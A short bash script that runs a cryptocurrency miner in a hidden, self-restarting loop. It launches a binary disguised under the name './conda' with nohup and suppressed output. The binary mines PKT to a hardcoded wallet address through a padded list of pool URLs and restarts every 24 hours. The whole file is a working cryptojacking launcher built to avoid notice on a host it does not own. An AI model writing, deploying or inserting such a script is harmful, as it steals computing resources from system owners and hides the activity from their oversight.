#!/bin/bash
sleep 60
while true; do
nohup ./conda ann -t 1 -p pkt1qcgnwpnefry7pcq2ul35ns26vav5h7a2lskur3h http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://pool.srizbi.com > /dev/null 2>&1 &
sleep 24h
pkill conda
sleep 6
done

